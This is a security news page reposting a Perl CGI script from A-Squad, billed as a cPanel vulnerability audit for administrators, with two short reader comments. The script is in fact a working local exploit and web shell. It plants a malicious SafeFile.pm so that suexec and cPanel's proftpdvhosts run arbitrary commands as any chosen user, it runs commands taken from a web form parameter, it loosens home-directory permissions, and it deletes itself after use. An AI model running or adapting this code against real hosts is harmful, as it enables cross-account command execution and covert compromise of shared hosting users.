SecuriTeam - cPanel Multiple Vulnerabilities Testing Script

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Credit:
The information has been provided by Rob Brown.
The original article can be found at: http://www.a-squad.com/audit/

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

A-Squad has built a simple to use perl scan that can be used by administrators to verify whether their cPanel system is vulnerable to multiple points of attack.

Testing Script:
#!/usr/bin/perl -w
# PROGRAM: tests.pl
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com

use strict;
use CGI ':standard';

if (my $query = shift) {
 $ENV{QUERY_STRING} = $query;
 $ENV{REQUEST_METHOD}="GET";
}
my $q = new CGI;

my @users = ();
my $me = "";
my $default_command = "id -a";
my $dummy = "/tmp/tests";

$| = 1;
print start_html("System Check");

my $action = "cpanel.php";
my $secure = 1;
my $locked = 1;
my $common = 0;
my $cpanel = 0;
my $canexe = 0;

print qq{<center><a href=http://www.a-squad.com/><img src=http://www.a-squad.com/Abanner.jpg border=0 alt="ADVERTISEMENT: A-Squad Certified Secure cPanel Hosting"></a></center>\n};
print "<ol>Performing white box security audit...\n";
if (-d "/usr/local/cpanel") {
 chomp($cpanel = `/usr/local/cpanel/cpanel -V`);
 print "<li>PASSED: cPanel INSTALLED ($cpanel)\n";
} else {
 print "<li>FAILED: cPanel NOT INSTALLED\n";
 print "<a href=http://www.a-squad.com/audit/explain1.html>Explain</a>\n";
}

my $uid = $<;
if ($uid < 500) {
 print "<li>FAILED: Privileged UID Vulnerability Check ($uid)\n";
 print "<a href=http://www.a-squad.com/audit/explain2.html>Explain</a>\n";
 my $nam = getpwuid $uid;
 if ($nam eq "nobody") {
 print "<li>FAILED: nobody execution\n";
 print "<a href=http://www.a-squad.com/audit/explain3.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: User $nam ($uid) is probably not shared\n";
 }
 $common = 1;
} else {
 print "<li>PASSED: Privileged UID Vulnerability Check ($uid)\n";
}

setpwent;
while (my ($name,$passwd,$uid,$gid,
 $quota,$comment,$gcos,$dir) = getpwent) {
 if ($uid >= 500) {
 push @users, $name;
 if ($ENV{PWD} =~ m%^\Q$dir\E/%) {
 $me = $name;
 $ENV{HOME} = $dir;
 }
 }
}

if ($me && $ENV{HOME} &&
 -d $ENV{HOME}) {
 my $mode = (stat _)[2];
 if ($mode & 1) {
 print "<li>FAILED: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
 print "<a href=http://www.a-squad.com/audit/explain4.html>Explain</a>\n";
 $secure = 0;
 $locked = 0;
 } else {
 print "<li>PASSED: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
 }
 if ($mode & 4) {
 print "<li>FAILED: Simple \$HOME Scanning [$ENV{HOME}]\n";
 print "<a href=http://www.a-squad.com/audit/explain5.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: Simple \$HOME Scanning [$ENV{HOME}]\n";
 }
 if ($mode & 32) {
 print "<li>FAILED: Group \$HOME Scanning [$ENV{HOME}]\n";
 print "<a href=http://www.a-squad.com/audit/explain6.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: Group \$HOME Scanning [$ENV{HOME}]\n";
 }
 $mode = (stat "$ENV{HOME}/..")[2];
 if ($mode & 4) {
 print "<li>FAILED: Root /home scanning\n";
 print "<a href=http://www.a-squad.com/audit/explain11.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: Root /home scanning\n";
 }
 $mode = (stat "$ENV{HOME}/public_html")[2];
 if (!$locked && $mode & 1) {
 print "<li>FAILED: Simple WEBROOT Protection\n";
 print "<a href=http://www.a-squad.com/audit/explain7.html>Explain</a>\n";
 } else {
 print "<li>PASSED: Simple WEBROOT Protection\n";
 }
 my $pubg = (stat _)[5];
 if ($common && !$locked and
 ($(==$pubg && ($mode & 8)) ||
 ($mode & 1)) {
 print "<li>FAILED: Real WEBROOT Protection\n";
 print "<a href=http://www.a-squad.com/audit/explain8.html>Explain</a>\n";
 $secure = 0;
 } else {
 print "<li>PASSED: Real WEBROOT Protection\n";
 }
} else {
 print "<li>FAILED: Unable to locate unprivileged homedir\n";
}

my $command = $q->param("command") || $default_command;
my $who = $q->param("username") || $me;
if ($cpanel && $common) {
 if ($command and $who) {
 mkdir $dummy, 0755;
 chdir $dummy;
 symlink("/usr/local/cpanel","cpanel");
 my $dir = (getpwnam $who)[7];
 open (DUMMY,">SafeFile.pm");
 $ENV{HOME} = $dir;
 print DUMMY qq{chdir "$dir";warn "\n";\nexec <<RUN$$;\n$command\nRUN$$\n};
 close DUMMY;
 my $out = `/usr/local/apache/bin/suexec $who $who cpanel/bin/proftpdvhosts 2>&1`;
 chdir "/var/tmp";
 system("rm","-rf",$dummy);
 if ($out) {
 print "<li>FAILED: SUEXEC <code>mod_php</code> Exploit Test\n";
 print "<a href=http://www.a-squad.com/audit/explain9.html>Explain</a>\n";
 print "<pre>EXEC [$command] as [$who]:\n";
 $out =~ s/&/&/g;
 $out =~ s/</</g;
 print $out,"</pre>\n";
 $canexe = 1;
 } else {
 print "<li>PASSED: SUEXEC <code>mod_php</code> Exploit Test\n";
 }
 }
} elsif ($cpanel && !$common) {
 my $probe = `PATH_TRANSLATED=/usr/local/cpanel/base/phpinfo.php SCRIPT_FILENAME=/dev/null REQUEST_METHOD=GET /usr/bin/php 2>&1`;
 if ($probe =~ /phpinfo/) {
 print "<li>FAILED: SUEXEC <code>mod_phpsuexec</code> Exploit Test\n";
 print "<a href=http://www.a-squad.com/audit/explain10.html>Explain</a>\n";
 $canexe = 1;
 $secure = 0;
 print "<pre>EXEC [$command] as [$who]:\n";
 my $out = `$command 2>&1`;
 $out =~ s/&/&/g;
 $out =~ s/</</g;
 print $out,"</pre>\n";
 if ($who ne $me) {
 print "Submit again to switch to another user... \n";
 my @guess = qw(/index.php /forum/index.php /forums/index.php);
 my $rand = $guess[rand @guess];
 $action = "/~$who$rand/~$me/cpanel.php";
 system "chmod o+x $ENV{HOME}";
 }
 } else {
 print "<li>PASSED: SUEXEC <code>mod_phpsuexec</code> Exploit Test\n";
 }
}
if ($cpanel) {
 if ($secure) {
 print "<li>PASSED: Congratulations, your cPanel configuration is secure!\n";
 } else {
 print "<li>FAILED: One or more insecure cPanel configurations were detected. Visit <a href=http://www.a-squad.com/>A-Squad.Com</a> for details on where to find more secure cPanel hosting.\n";
 }
}
print "</ol>";
print
 start_form(-method => "GET",-action => $action,-name=>"f"),
 "Username: ",
 popup_menu
 (-name => "username",
 -values => [ sort @users ],
 -default => $who,
 ),
 br,
 "Password: (not required)",br,
 "Command: ",
 textfield(-name => "command",-value=> $command),
 br,
 submit(-value=> "Test Execution"),
 end_form,
 "\n<script>f.command.focus()</script>\n"
 if $canexe;
print end_html;
-M$0>0.01&&unlink$0;

Subject:	errm, doh	Date:	9 Oct. 2006
From:	dohdohland.com
-M$0>0.01&&unlink$0;

Subject:	Brilliant	Date:	18 Jan. 2007
From:	f0rg3
Thanks for the c0d3...much much learning you have spawned

	Netifera - Modular Open Source Platform for Security Tools
	WarVOX - Tools for Exploring, Classifying, and Auditing Telephone Systems
	Webshag - Web Server Audit Tool
	Browser Fuzzer
	FSpy - Linux Filesystem Activity Monitoring
	telnetrecon - Telnet Recon
	Zerowine Sandbox
	JPEG Fuzzer
	VNC Server Fuzzer
	RSH Fuzzer
	Exomind
	Browser Rider
	MP3 TAG Fuzzer
	PDFuzzer - PDF File Standard Fuzzer
	Miranda - UPNP Administration and Audit Tool